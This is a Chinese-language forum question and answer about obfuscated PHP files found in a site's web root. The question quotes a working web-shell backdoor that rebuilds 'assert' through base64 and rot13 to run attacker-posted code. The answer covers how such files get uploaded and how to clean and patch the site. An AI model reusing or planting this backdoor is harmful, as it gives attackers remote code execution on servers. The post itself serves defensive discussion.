我刚刚注意到我的网站根目录中有几个 php 文件,但我没有把它们放在那里。它们包含模糊代码(见下文),这些代码会转换为尝试获取/发布/断言语句。我的问题是,其他人是否见过这种情况,这是否是一种常见的黑客行为,以及他们如何能够将其放在网站上?
<?php ${"G\x4c\x4f\x42\x41\x4c\x53"}["g\x70x\x65\x62p\x63\x75"]="c";if(isset($_GET["213d7"])&&isset($_POST["42df9"])){${${"\x47\x4cO\x42A\x4c\ x53"}["g\x70\x78\x65\x62p\x63\x75"]}=base64_decode("YX\x4ez\x5aX\x49\x3d")."t";@${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x70xe\x62\x70c\x75"]}($_PO ST["42df9"]);exit();} ?><?php ${"G\x4c\x4f\x42\x41\x4c\x53"}["g\x70x\x65\x62p\x63\x75"]="c";if(isset($_GET["c991d"])&&isset($_POST["bc05e"])){ ${${"\x47\x4cO\x42A\x4c\x53"}["g\x70\x78\x65\x62p\x63\x75"]}=base64_decode("YX\x4ez\x5aX\x49\x3d")."t";@${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x7 0xe\x62\x70c\x75"]}($_POST["bc05e"]);exit();} ?><?php if (isset($_POST['b0e4d'])) {$license = str_rot13('n'.'f'.'f'.'r'.'e'.'g');$license($_PO ST['b0e4d']);}?>```
答案1
是的,听起来您的网站有恶意软件。
黑客可以通过漏洞或者通过已上传的充当文件管理器的脚本来上传这些文件。
例如,如果您的网站允许上传任何文件(如图像),他们可以尝试将恶意软件文件上传到您的网站(使用专门准备的图像),然后利用系统中的弱点运行它(如直接访问该文件)。
阅读更多:
如果您使用内容管理系统,请确保它始终是最新的,以避免风险。
要了解此类恶意软件文件的工作原理,请检查:这个恶意 PHP 脚本会做什么?
因此,接下来建议的步骤是:
查找所有恶意软件文件并将其删除。
看:如何摆脱类似 eval-base64_decode 的 PHP 病毒文件?
您可以使用恶意软件扫描程序,例如
如果您使用专用服务器,请升级系统上所有过时的软件包(
apt-get update)。- 升级过时的 PHP 库(第三方代码)和内容管理系统(如果正在使用)。
- 保持您的第三方库和代码为最新。